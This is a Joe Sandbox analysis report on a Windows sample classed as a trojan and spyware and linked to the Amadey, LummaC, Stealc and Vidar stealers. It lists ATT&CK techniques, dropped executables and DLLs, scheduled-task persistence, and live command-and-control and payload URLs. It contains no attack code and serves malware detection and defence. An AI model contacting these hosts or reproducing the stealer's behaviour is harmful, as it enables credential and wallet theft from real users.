Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	12 Process Injection	4 Obfuscated Files or Information	Security Account Manager	237 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	241 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	49%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\Documents\JJECFIECBG.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\JJECFIECBG.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://185.215.113.206M=U	0%	Avira URL Cloud	safe
http://185.215.113.16/luma/random.exe613	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/freebl3.dllH	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/msvcp140.dllX	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpDA	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	Avira URL Cloud	safe
http://185.215.113.206c4becf79229cb002.phpd2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8Kn	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/nss3.dllV	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php----GV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8Kn	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
atten-supporse.biz	104.21.16.9	true	false	high
www3.l.google.com	142.250.181.142	true	false	high
plus.l.google.com	172.217.17.78	true	false	high
www.google.com	172.217.21.36	true	false	high
ax-0001.ax-msedge.net	150.171.28.10	true	false	high
ogs.google.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.206/	false	high
http://185.215.113.16/mine/random.exe	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239401719378_1QE5OGFYA33L2ZPDG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239385875220_1FZJ7DDRUSKY0IVFA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239401719379_1QJHVIFGU1A436B66&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239399230509_1P8TI1N52GIEG4TVD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
http://185.215.113.206/68b591d6548ec281/msvcp140.dll	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high
https://www.google.com/async/newtab_promos	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239399230510_1EL19IE1YUCVQBSJB&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239356819466_1PN1118HHI92HRAXE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239356819467_11XRGHD2R08E7TNPP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://www.google.com/async/ddljson?async=ntp:2	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239399109665_1344PV668L57B53FJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239385875217_1AS9NW8J4VEXSVA8E&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239399109664_12R6JVR4SJZQSTHCV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
http://www.broofa.com	chromecache_181.6.dr	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dllH	file.exe, 00000001.00000002.2760035051.00000000018A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpe	file.exe, 00000001.00000002.2758733046.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false		high
http://185.215.113.206M=U	file.exe, 00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2767616784.000000000C062000.00000004.00000020.00020000.00000000.sdmp, DBFBFBGDBKJJKFIEHJDB.1.dr	false		high
http://185.215.113.16/luma/random.exe	skotes.exe, 00000016.00000002.3409992236.0000000000C45000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/(	file.exe, 00000001.00000002.2760035051.00000000018A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	chromecache_181.6.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpation	file.exe, 00000001.00000002.2758733046.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
https://apis.google.com	chromecache_181.6.dr	false		high
http://185.215.113.206ta	file.exe, 00000001.00000002.2758733046.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false		high
http://www.sqlite.org/copyright.html.	file.exe, 00000001.00000002.2771988903.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2764537815.0000000006039000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr	false		high
https://mozilla.org0/	nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2767616784.000000000C062000.00000004.00000020.00020000.00000000.sdmp, DBFBFBGDBKJJKFIEHJDB.1.dr	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	DBFBFBGDBKJJKFIEHJDB.1.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
https://atten-supporse.biz/api	60949160aa.exe, 00000018.00000002.3407506576.0000000001111000.00000004.00000020.00020000.00000000.sdmp, 60949160aa.exe, 00000018.00000002.3407506576.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php----GV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8Kn	file.exe, 00000001.00000002.2758733046.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
http://185.215.113.206/c4becf79229cb002.php4	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	DHJJEGHIIDAFIDHJDHJEBAEGHC.1.dr	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2767616784.000000000C062000.00000004.00000020.00020000.00000000.sdmp, DBFBFBGDBKJJKFIEHJDB.1.dr	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_181.6.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpDA	file.exe, 00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/luma/random.exe613	skotes.exe, 00000016.00000002.3409992236.0000000000C45000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	DHJJEGHIIDAFIDHJDHJEBAEGHC.1.dr	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2767616784.000000000C062000.00000004.00000020.00020000.00000000.sdmp, DBFBFBGDBKJJKFIEHJDB.1.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2767616784.000000000C062000.00000004.00000020.00020000.00000000.sdmp, DBFBFBGDBKJJKFIEHJDB.1.dr	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dllX	file.exe, 00000001.00000002.2760035051.00000000018A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206c4becf79229cb002.phpd2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8Kn	file.exe, 00000001.00000002.2758733046.0000000001044000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://atten-supporse.biz:443/api	60949160aa.exe, 00000018.00000002.3407506576.0000000001111000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org	DHJJEGHIIDAFIDHJDHJEBAEGHC.1.dr	false		high
http://185.215.113.206	file.exe, 00000001.00000002.2758733046.0000000001044000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	60949160aa.exe, 00000018.00000002.3407506576.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, GCGDHJDA.1.dr	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2767616784.000000000C062000.00000004.00000020.00020000.00000000.sdmp, DBFBFBGDBKJJKFIEHJDB.1.dr	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dllV	file.exe, 00000001.00000002.2760035051.00000000018A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpp	skotes.exe, 00000016.00000002.3409992236.0000000000C27000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.17.78	plus.l.google.com	United States	15169	GOOGLEUS	false
142.250.181.142	www3.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false
104.21.16.9	atten-supporse.biz	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570933
Start date and time:	2024-12-08 13:30:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@39/53@7/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 217.20.58.99, 20.198.119.143, 172.217.19.238, 64.233.162.84, 172.217.19.163, 172.217.17.46, 172.217.21.35, 142.250.181.10, 142.250.181.138, 142.250.181.74, 172.217.17.42, 172.217.17.74, 216.58.208.234, 172.217.19.234, 172.217.19.10, 172.217.19.202, 142.250.181.42, 142.250.181.106, 2.22.50.144, 2.22.50.131
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, g.bing.com, a767.dspw65.akamai.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, clients2.google.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com, wu-b-net.trafficmanager.net, optimizationguide-pa.googleapis.com
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:31:41	API Interceptor	355x Sleep call for process: file.exe modified
07:33:01	API Interceptor	122x Sleep call for process: skotes.exe modified
13:32:11	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
185.215.113.16	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.9
ax-0001.ax-msedge.net	3qvTuHPZz2.exe	Get hash	malicious	Meduza Stealer	Browse	150.171.27.10
	file.exe	Get hash	malicious	Unknown	Browse	150.171.27.10
	JHiOAQekpj.exe	Get hash	malicious	Akira	Browse	150.171.27.10
	XcHLlyubFA.exe	Get hash	malicious	Akira	Browse	150.171.28.10
	abcoTE52hg.exe	Get hash	malicious	Akira	Browse	150.171.28.10
	ZmhpSGsGme.exe	Get hash	malicious	Akira	Browse	150.171.27.10
	file.exe	Get hash	malicious	Stealc	Browse	150.171.27.10
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10
	file.exe	Get hash	malicious	Credential Flusher	Browse	150.171.28.10
	https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	QZKG2scmaT.exe	Get hash	malicious	Pony	Browse	172.67.180.93
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	Q8o0Mx52Fd.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	Q8o0Mx52Fd.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	vzHOEzLbDj.exe	Get hash	malicious	Unknown	Browse	172.67.75.251
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63 40.126.53.11 23.218.208.109 20.12.23.50
